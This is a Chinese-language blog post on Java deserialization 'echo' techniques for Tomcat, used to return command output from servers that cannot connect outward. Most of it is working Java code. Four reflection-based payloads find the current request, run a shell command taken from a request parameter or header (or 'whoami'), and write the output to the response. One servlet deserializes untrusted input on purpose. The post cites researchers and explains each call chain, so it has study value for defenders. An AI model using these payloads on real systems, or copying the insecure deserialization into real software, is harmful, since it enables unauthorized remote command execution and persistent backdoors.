java反序列化回显自闭之旅

最近看见很多java反序列化回显的文章,用来解决内网rce不出网的情况,边学边记录一下。
因为有那么多的框架和中间件,肯定没办法面面俱到,主要关注tomcat下通用的回显方法。先整理下tomcat的架构以及运行流程,观察下可以利用的地方。
首先tomcat可以总体分为两部分:连接器和容器,对应到代码里就是Coyote和Catalina,如图:

从图中看出,客户端发送socket请求到Coyote,coyote处理后得到Request对象,CoyoteAdapter处理后封装为servlet对象传递给Catalina。细致的过程如图

所以可以直接找servlet对象,也可以找原生的Coyote的Request对象,因为servlet也是由request而来的。实际上应该是后者方便一些,因为调用链越长越复杂。
不过最早被分享的方法是直接找servlet的,是一个tomcat下半通用的思路,来自kingkk(https://xz.aliyun.com/t/7348)。
具体方法是在org.apache.catalina.core.ApplicationFilterChain找到lastServicedResponse,获取ServletResponse。可以观察下图的tomcat的web请求流程,读代码可以发现filterChain中是封装了servlet的。

测试用的springmvc,需要导入tomcat8.5的jar包,分析写在注释里了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
package cn.halfblue.controller;

import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Scanner;

@Controller
public class testResController {

    @RequestMapping("vuln8")
    @ResponseBody
    public String vuln8(String input) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");//以下几行为反射修改private static final变量的流程
        Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
        Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
        Field modifiersField = Field.class.getDeclaredField("modifiers");
        modifiersField.setAccessible(true);
        modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
        modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL);
        modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL);
        WRAP_SAME_OBJECT_FIELD.setAccessible(true);
        lastServicedRequestField.setAccessible(true);
        lastServicedResponseField.setAccessible(true);

        ThreadLocal<ServletResponse> lastServicedResponse =
                (ThreadLocal<ServletResponse>) lastServicedResponseField.get(null);//获取实例
        ThreadLocal<ServletRequest> lastServicedRequest = (ThreadLocal<ServletRequest>) lastServicedRequestField.get(null);//同上
        boolean WRAP_SAME_OBJECT = WRAP_SAME_OBJECT_FIELD.getBoolean(null);//同上
        String cmd = lastServicedRequest != null
                ? lastServicedRequest.get().getParameter("cmd")
                : null;//获取cmd参数的值
        if (!WRAP_SAME_OBJECT || lastServicedResponse == null || lastServicedRequest == null) {
            lastServicedRequestField.set(null, new ThreadLocal<>());//赋值
            lastServicedResponseField.set(null, new ThreadLocal<>());//赋值
            WRAP_SAME_OBJECT_FIELD.setBoolean(null, true);//赋值
        } else if (cmd != null) {//回显内容
            ServletResponse responseFacade = lastServicedResponse.get();//获取当前请求response
            java.io.Writer w = responseFacade.getWriter();

            Field responseField = ResponseFacade.class.getDeclaredField("response");//修改usingwriter,让页面可以写正常内容以及命令回显
            responseField.setAccessible(true);
            Response response = (Response) responseField.get(responseFacade);
            Field usingWriter = Response.class.getDeclaredField("usingWriter");
            usingWriter.setAccessible(true);
            usingWriter.set(response, Boolean.FALSE);

            boolean isLinux = true;//执行命令
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\a");
            String output = s.hasNext() ? s.next() : "";
            w.write(output);
            w.flush();
        }

        return input;
    }
}

注意的点主要有反射修改private static final值的方法,以及反射修改usingwriter的值,否则会爆getWriter() has already been called for this response错误,但其实不影响执行命令。
但这个方法的问题在于,service(request, response)是在所有filter执行完毕后运行的,如果执行代码的过程本身就在filter中(如shiro反序列化),那么就没办法获取到servlet对象了。
上边的方法是改变了tomcat请求的流程。另外的思路是直接找全局的response调用。这种思路就是在容器(Catalina)的处理逻辑之前找到Request对象,也就是在连接器(Coyote)内直接找processor。 后面的几种思路都是基于这个过程,不同的是获取processor的流程。
第一种方法是来自Litch1(https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651374294&idx=3&sn=82d050ca7268bdb7bcf7ff7ff293d7b3)
利用Thread.currentThread().getContextClassLoader()类加载器直接获取全局context,然后获取service下的connector–>protocolHandler–>processor–>Request。测试用的springboot(spring initializr真省事),思路写在注释里。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
@RestController
public class vulnController {
    @RequestMapping("/vuln")
    public void vuln() throws NoSuchFieldException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, IOException, ClassNotFoundException {
        try {
            //传递的参数,后门标识
            String pass = "resp";

            //获取WebappClassLoaderBase
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

            //获取ApplicationContext
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            contextField.setAccessible(true);
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());

            //获取StandardService
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            serviceField.setAccessible(true);
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);

            //获取Connector
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();

            //找到指定的Connector
            for (int i = 0; i < connectors.length; i++) {
                if (connectors[i].getScheme().contains("http")) {
                    //获取protocolHandler、connectionHandler
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler", null);
                    getHandlerMethod.setAccessible(true);
                    org.apache.tomcat.util.net.AbstractEndpoint.Handler connectionHandler = (org.apache.tomcat.util.net.AbstractEndpoint.Handler) getHandlerMethod.invoke(protocolHandler, null);

                    //获取RequestGroupInfo
                    java.lang.reflect.Field globalField = Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global");
                    globalField.setAccessible(true);
                    org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(connectionHandler);

                    //获取RequestGroupInfo中储存了RequestInfo的processors
                    java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                    processorsField.setAccessible(true);
                    java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                    for (int k = 0; k < list.size(); k++) {
                        org.apache.coyote.RequestInfo requestInfo = (org.apache.coyote.RequestInfo) list.get(k);
                        if (requestInfo.getCurrentQueryString().contains(pass)) {
                            //获取request
                            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
                            requestField.setAccessible(true);
                            org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(requestInfo);
                            org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
                            //执行命令
                            String cmd = "whoami";
                            String[] cmds = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                            java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                            java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
                            String output = s.hasNext() ? s.next() : "";
                            //回显
                            java.io.Writer writer = request.getResponse().getWriter();
                            java.lang.reflect.Field usingWriter = request.getResponse().getClass().getDeclaredField("usingWriter");
                            usingWriter.setAccessible(true);
                            usingWriter.set(request.getResponse(), Boolean.FALSE);
                            writer.write(output);
                            writer.flush();
                            break;
                        }
                        break;
                    }
                    break;
                }
            }
        }
        catch (Exception e) {
        }
    }
}

这个方法的具体调用链是WebappClassLoaderBase —> ApplicationContext(getResources().getContext()) —> StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInfo global—>RequestInfo——->Request——–>Response。
这个方法的问题是tomcat8以下使用不了。
下一个思路来自于c0ny1(https://paper.seebug.org/1181/)
自动化寻找,遍历所有的类。直接在中间件中挖掘request对象,然后反射获取。不过获取到的利用链都大同小异,都是获取当前所有线程然后从endpoint中获取protocolhandler
先写个简单的servlet,为了找tomcat中的链所以不用spring之类的框架,不然找到的都是框架中的。这里就写个跟他文章里一样的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public class HelloServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try {
            InputStream is = req.getInputStream();

            ObjectInputStream oos = new ObjectInputStream(is);//这里打断点
            oos.readObject();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }

        System.out.println("Hello");
    }
}

然后断点下在反序列化那里,模拟真实的利用过程。在evaluate中运行这些代码。注意把他写的类和tomcat的类都导入项目中,不然爆各种各样的错误。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
List<Keyword> keys = new ArrayList<>();
      keys.add(new Keyword.Builder().setField_type("Request").build());
      keys.add(new Keyword.Builder().setField_type("Response").build());
      //定义黑名单
      List<Blacklist> blacklists = new ArrayList<>();
      blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build());
      //新建一个广度优先搜索Thread.currentThread()的搜索器
      SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);
      // 设置黑名单
      searcher.setBlacklists(blacklists);
      //打开调试模式,会生成log日志
      searcher.setIs_debug(true);
      //挖掘深度为20
      searcher.setMax_search_depth(20);
      //设置报告保存位置
      searcher.setReport_save_path("C:\\Users\\bz\\Desktop\\ctf-old\\java反序列化\\request-searcher");
      searcher.searchObject();

不同的tomcat版本跑出来的结果还不一样,虽然大同小异但还是有差别。因为不同版本用的io协议可能不同(Nio/Bio/Apr),并且handler的类型也不同。

1
2
3
4
5
6
7
8
9
10
11
12
TargetObject = {org.apache.tomcat.util.threads.TaskThread} 
  ---> group = {java.lang.ThreadGroup} 
   ---> threads = {class [Ljava.lang.Thread;} 
    ---> [13] = {java.lang.Thread} 
     ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller} 
         ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint} 
           ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler} 
            ---> global = {org.apache.coyote.RequestGroupInfo} 
             ---> processors = {java.util.ArrayList<org.apache.coyote.RequestInfo>} 
              ---> [0] = {org.apache.coyote.RequestInfo} 
               ---> req = {org.apache.coyote.Request}

感觉整理一个通用的也比较困难,写了个tomcat8和9下的链。tomcat7还是不一样的地方太多了,原文作者的链是7的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
public class resp8Servlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try {
            Object obj = Thread.currentThread();
            Field field = obj.getClass().getSuperclass().getDeclaredField("group");
            field.setAccessible(true);
            obj = field.get(obj);

            field = obj.getClass().getDeclaredField("threads");
            field.setAccessible(true);
            obj = field.get(obj);

            Thread[] threads = (Thread[]) obj;
            int flag = 0;
            for (Thread thread : threads) {
                if(flag == 1) {
                    break;
                }

                Field[] fields = thread.getClass().getDeclaredFields();
                for(int i = 0 , len = fields.length; i < len; i++) {
                    // 对于每个属性,获取属性名
                    String varName = fields[i].getName();
                    if(varName.contains("target")){
                        try {
                            field = thread.getClass().getDeclaredField("target");
                            field.setAccessible(true);
                            obj = field.get(thread);

                            if(obj.getClass().getName().contains("NioEndpoint$Poller")) {
                                field = obj.getClass().getDeclaredField("this$0");
                                field.setAccessible(true);
                                org.apache.tomcat.util.net.NioEndpoint Nioobj = (org.apache.tomcat.util.net.NioEndpoint) field.get(obj);
                                obj = Nioobj.getHandler();

                                field = obj.getClass().getDeclaredField("global");
                                field.setAccessible(true);
                                obj = field.get(obj);

                                field = obj.getClass().getDeclaredField("processors");
                                field.setAccessible(true);
                                obj = field.get(obj);

                                ArrayList processors = (ArrayList) obj;
                                for (Object o : processors) {
                                    try {
                                        field = o.getClass().getDeclaredField("req");
                                        field.setAccessible(true);
                                        obj = field.get(o);
                                        org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) obj;

                                        org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
                                        String cmd = "whoami";
                                        String[] cmds = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                                        java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                                        java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
                                        String out = s.hasNext() ? s.next() : "";
                                        java.io.Writer writer = request.getResponse().getWriter();
                                        java.lang.reflect.Field usingWriter = request.getResponse().getClass().getDeclaredField("usingWriter");
                                        usingWriter.setAccessible(true);
                                        usingWriter.set(request.getResponse(), Boolean.FALSE);
                                        writer.write(out);
                                        writer.flush();
                                        flag = 1;
                                    } catch (Exception e) {
                                        e.printStackTrace();
                                    }
                                }
                            }

                        }
                        catch (Exception e) {
                            e.printStackTrace();
                        }
                    }
                }

            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

其实和Litch1的后半段是一样的,区别在于获取ConnectionHandler的过程。这个工具的思路是从Thread.currentThread()出发的。
在后半段一样的基础上还有第三种方法,来自李三(https://xz.aliyun.com/t/7535)
利用注册组件直接获取processor。这个方法也是最通用的,本地单机测试tomcat789都可以。具体获取方法和代码是从参考文章里抄的,改了下打印的部分变成通用的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
public class mbeanServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try {
            MBeanServer mBeanServer = Registry.getRegistry(null, null).getMBeanServer();
            Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
            field.setAccessible(true);
            Object mbsInterceptor = field.get(mBeanServer);

            field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
            field.setAccessible(true);
            Repository repository = (Repository) field.get(mbsInterceptor);
            Set<NamedObject> set = repository.query(new ObjectName("*:type=GlobalRequestProcessor,name=\"http*\""), null);

            Iterator<NamedObject> it = set.iterator();
            while (it.hasNext()) {
                NamedObject namedObject = it.next();
                field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("name");
                field.setAccessible(true);

                field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object");
                field.setAccessible(true);
                Object obj = field.get(namedObject);

                field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
                field.setAccessible(true);
                Object resource = field.get(obj);

                field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
                field.setAccessible(true);
                ArrayList processors = (ArrayList) field.get(resource);

                field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
                field.setAccessible(true);
                for (int i=0; i < processors.size(); i++) {
                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) field.get(processors.get(i));
                    org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);

                    String cmd = request.getHeader("tomcat");
                    String[] cmds = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                    java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                    java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
                    String out = s.hasNext() ? s.next() : "";

                    java.io.Writer writer = request.getResponse().getWriter();
                    java.lang.reflect.Field usingWriter = request.getResponse().getClass().getDeclaredField("usingWriter");
                    usingWriter.setAccessible(true);
                    usingWriter.set(request.getResponse(), Boolean.FALSE);
                    writer.write(out);
                    writer.flush();

                }
            }
        }catch (Throwable throwable) {
            throwable.printStackTrace();
        }
    }
}

总的来说最后一种方法是最好的,原理简单,通用性强。

参考链接
https://xz.aliyun.com/t/7348
https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651374294&idx=3&sn=82d050ca7268bdb7bcf7ff7ff293d7b3
https://xz.aliyun.com/t/7535
https://paper.seebug.org/1181/
https://lucifaer.com/2020/05/12/Tomcat%E9%80%9A%E7%94%A8%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家